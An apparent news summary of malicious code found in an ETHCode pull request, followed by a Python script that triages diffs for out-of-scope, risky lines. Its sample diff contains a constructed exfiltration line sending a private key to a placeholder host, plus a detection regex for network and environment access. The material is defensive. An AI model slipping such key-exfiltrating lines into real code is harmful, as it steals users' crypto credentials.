Cybersecurity firm ReversingLabs discovered two lines of malicious code in an update to ETHCode, an open-source toolkit used by Ethereum developers. The code was hidden in a GitHub pull request of 43 commits and 4,000 lines whose stated purpose was to add a new testing framework. The update was submitted on June 17 by a user with no previous contributions, and it passed review by both GitHub's AI reviewer and the ETHCode creators. The malicious code could potentially have allowed attackers to steal crypto assets or compromise Ethereum contracts. There is no evidence that it was actually used to steal tokens, but its presence highlights how exposed open-source projects in the crypto industry are when developers install packages without sufficient scrutiny. Experts stress the need to verify contributor identities and review dependencies, since assuming a package is safe because it is popular invites exploitation. Developers are advised to use tools that flag suspicious behavior in code and to isolate sensitive programs from development environments.
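As an added example (not code from ReversingLabs, ETHCode or the original article), the following Python script shows one way to act on the reviewing advice above: given a unified diff and the pull request's stated scope (here, test files), it lists every file changed outside that scope, how small a share of the PR those changes are, and any added lines that reach the network, spawn processes or read environment variables. The sample diff and the risky-pattern regex are constructed assumptions, not taken from the real ETHCode pull request.

```python
import re
from collections import defaultdict
# Constructed sample diff (not the real ETHCode PR): a test-framework addition
# that also slips two lines of outbound network code into deploy logic.
SAMPLE_DIFF = """\
diff --git a/test/framework.js b/test/framework.js
--- /dev/null
+++ b/test/framework.js
@@ -0,0 +1,3 @@
+function run(suite) { return suite(); }
+function assertEq(a, b) { if (a !== b) throw new Error('neq'); }
+module.exports = { run, assertEq };
diff --git a/src/deploy.js b/src/deploy.js
--- a/src/deploy.js
+++ b/src/deploy.js
@@ -10,3 +10,5 @@ function deploy(cfg) {
   const key = cfg.privateKey;
+  const https = require('https');
+  https.get('https://example.invalid/c?k=' + key);
   return sign(key);
 }
"""
FILE_RE = re.compile(r"^diff --git a/\S+ b/(\S+)$")
# Assumed heuristic: added lines touching network, subprocesses or env vars.
RISKY_RE = re.compile(r"require\(['\"]https?['\"]\)|\.get\(|fetch\(|child_process|process\.env")

def added_lines_by_file(diff_text):
    """Map each file in a unified diff to the lines it adds (no '+++' headers)."""
    added, path = defaultdict(list), None
    for line in diff_text.splitlines():
        m = FILE_RE.match(line)
        if m:
            path = m.group(1)
        elif path and line.startswith("+") and not line.startswith("+++"):
            added[path].append(line[1:].strip())
    return dict(added)

def triage(diff_text, scope_prefixes=("test/", "tests/")):
    """Files outside the PR's stated scope, their share of all added lines, and risky lines."""
    added = added_lines_by_file(diff_text)
    total = sum(len(v) for v in added.values())
    findings = {}
    for path, lines in added.items():
        if not path.startswith(scope_prefixes):
            findings[path] = {"added": len(lines),
                              "share": round(len(lines) / total, 3) if total else 0.0,
                              "risky": [l for l in lines if RISKY_RE.search(l)]}
    return findings
```

A small "share" combined with non-empty "risky" is the pattern described in the article: a handful of lines buried in a large change whose headline purpose is something else.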
